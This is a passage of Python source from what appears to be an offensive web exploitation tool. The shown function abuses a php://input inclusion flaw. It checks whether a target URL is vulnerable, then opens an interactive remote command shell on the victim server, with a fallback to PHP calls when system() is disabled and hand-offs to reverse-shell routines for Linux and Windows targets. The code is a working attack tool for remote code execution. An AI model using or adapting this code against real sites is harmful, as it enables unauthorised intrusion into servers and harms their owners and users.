| 1215 | return got[:-1] |
| 1216 | |
| 1217 | def run_phpinput(): |
| 1218 | global ahurl |
| 1219 | global ahactive |
| 1220 | global victimOs |
| 1221 | |
| 1222 | if(ahactive is False): |
| 1223 | inputurl = raw_input("[*] Enter the php://input vulnerable url (ex: 'http://site/index.php?page=') -> ") |
| 1224 | else: |
| 1225 | inputurl = ahurl |
| 1226 | |
| 1227 | inputurl = checkHttp(inputurl) |
| 1228 | inputurl = cutURLToLastEqual(inputurl) |
| 1229 | resp = send_phpinput_cmd("echo Bodom", inputurl) |
| 1230 | got = SubstrFind(resp,"AbracadabrA **") |
| 1231 | phpcmd = False |
| 1232 | |
| 1233 | if(len(got) == 0): |
| 1234 | return |
| 1235 | if("system() has been disabled for security reasons in" in resp): |
| 1236 | phpcmd = True |
| 1237 | |
| 1238 | point = got[0]+15 |
| 1239 | print "\n[+] The website seems to be vulnerable. Opening a Shell.." |
| 1240 | |
| 1241 | if(phpcmd is False): |
| 1242 | _id = cleanOutput(extract_phpinput_res(send_phpinput_cmd("id",inputurl)), True) |
| 1243 | if(len(_id) == 0): |
| 1244 | path = cleanOutput(extract_phpinput_res(send_phpinput_cmd("path",inputurl)), True) |
| 1245 | if(checkIfWindows(path)): |
| 1246 | victimOs = "Windows" |
| 1247 | |
| 1248 | print colored("[If you want to send PHP commands rather than system commands add php:// before them (ex: php:// fwrite(fopen('a.txt','w'),\"content\");]\n","red") |
| 1249 | whoami = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("whoami",inputurl)), True)) |
| 1250 | if(victimOs != "Windows"): |
| 1251 | pwd = cleanOutput(extract_phpinput_res(send_phpinput_cmd("pwd",inputurl)), True) |
| 1252 | else: |
| 1253 | pwd = cleanOutput(extract_phpinput_res(send_phpinput_cmd("cd",inputurl)), True) |
| 1254 | else: |
| 1255 | onlyPhpPrint() |
| 1256 | whoami = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("php://get_current_user();",inputurl)), True)) |
| 1257 | pwd = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("php://getcwd();",inputurl)), True)) |
| 1258 | |
| 1259 | time.sleep(1) |
| 1260 | inputmain = removeHttpFromWebsite(extractWebsiteFromUrl(inputurl)) |
| 1261 | cmd = "" |
| 1262 | while(cmd != "exit" and cmd != "quit" and cmd != "php://exit" and cmd != "php://quit"): |
| 1263 | if(phpcmd): |
| 1264 | cmd = raw_input("%s@%s:%s$ PHP:// " %(whoami,inputmain,pwd)) |
| 1265 | if(cmd[:6] != "php://"): |
| 1266 | cmd = "php://%s" %cmd |
| 1267 | else: |
| 1268 | cmd = raw_input("%s@%s:%s$ " %(whoami,inputmain,pwd)) |
| 1269 | if(cmd != "exit" and cmd != "quit" and cmd != "php://exit" and cmd != "php://quit"): |
| 1270 | if(phpcmd is False and checkIfReverseShell(cmd)): |
| 1271 | if(victimOs != "Windows"): |
| 1272 | phpinput_reverse_shell(inputurl) |
| 1273 | else: |
| 1274 | windows_phpinput_reverse_shell(inputurl) |